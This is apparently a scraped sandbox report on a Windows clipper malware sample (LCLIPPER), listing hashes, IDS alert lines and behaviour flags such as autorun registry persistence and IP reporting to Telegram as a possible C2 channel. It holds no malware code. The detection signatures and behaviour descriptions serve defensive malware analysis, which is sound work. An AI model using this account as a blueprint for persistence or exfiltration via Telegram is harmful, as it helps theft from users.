ocsp.godaddy.com	192.124.249.24 192.124.249.41 192.124.249.22 192.124.249.36 192.124.249.23	whitelisted
crl.microsoft.com	23.48.23.143 23.48.23.156	whitelisted
www.microsoft.com	69.192.161.161	whitelisted
login.live.com	20.190.160.132 20.190.160.128 40.126.32.133 20.190.160.2 20.190.160.67 40.126.32.72 40.126.32.74 20.190.160.22	whitelisted

Threats

PID	Process	Class	Message
2200	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Check (ip-api .com)
3100	SecuriteInfo.com.Win64.MalwareX-gen.6869.2505.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup ip-api.com
2200	svchost.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
2200	svchost.exe	Misc activity	SUSPICIOUS [ANY.RUN] Possible sending an external IP address to Telegram
2200	svchost.exe	Misc activity	ET HUNTING Telegram API Domain in DNS Lookup
6412	GoogleChrome.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup ip-api.com
6412	GoogleChrome.exe	Misc activity	ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
6412	GoogleChrome.exe	Misc activity	ET HUNTING Telegram API Certificate Observed

Add for printing

No debug info

General Info

SecuriteInfo.com.Win64.MalwareX-gen.6869.2505

E8C399A261B2B3B978C789E0C3D77D65

223FB0B1CAF5D3CA38F87E82F235C6310D3476F0

DA1A5FB86D21C58F2483F9AF83BF9196053C981606F1A74D5D47C23D843D8F41

6144:1Aj4wrEv8vmxmmNO09kEfz+meUACAhDx:1Aj4Hv8vn4O09kEfz+OAJDx

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

LCLIPPER mutex has been found

Changes the autorun value in the registry

LCLIPPER has been detected (YARA)

SUSPICIOUS

Executable content was dropped or overwritten

Reads security settings of Internet Explorer

Application launched itself

Starts CMD.EXE for commands execution

Runs PING.EXE to delay simulation

The executable file from the user directory is run by the CMD process

Checks for external IP

Process communicates with Telegram (possibly using it as an attacker's C2 server)

There is functionality for capture public ip (YARA)

Possible usage of Discord/Telegram API has been detected (YARA)

INFO

Reads the computer name

Reads the machine GUID from the registry

Checks supported languages

Checks proxy server information

Creates files or folders in the user directory

Reads the software policy settings

Launching a file from a Registry key

Manual execution by a user

Malware configuration

ims-api

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

ims-api

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings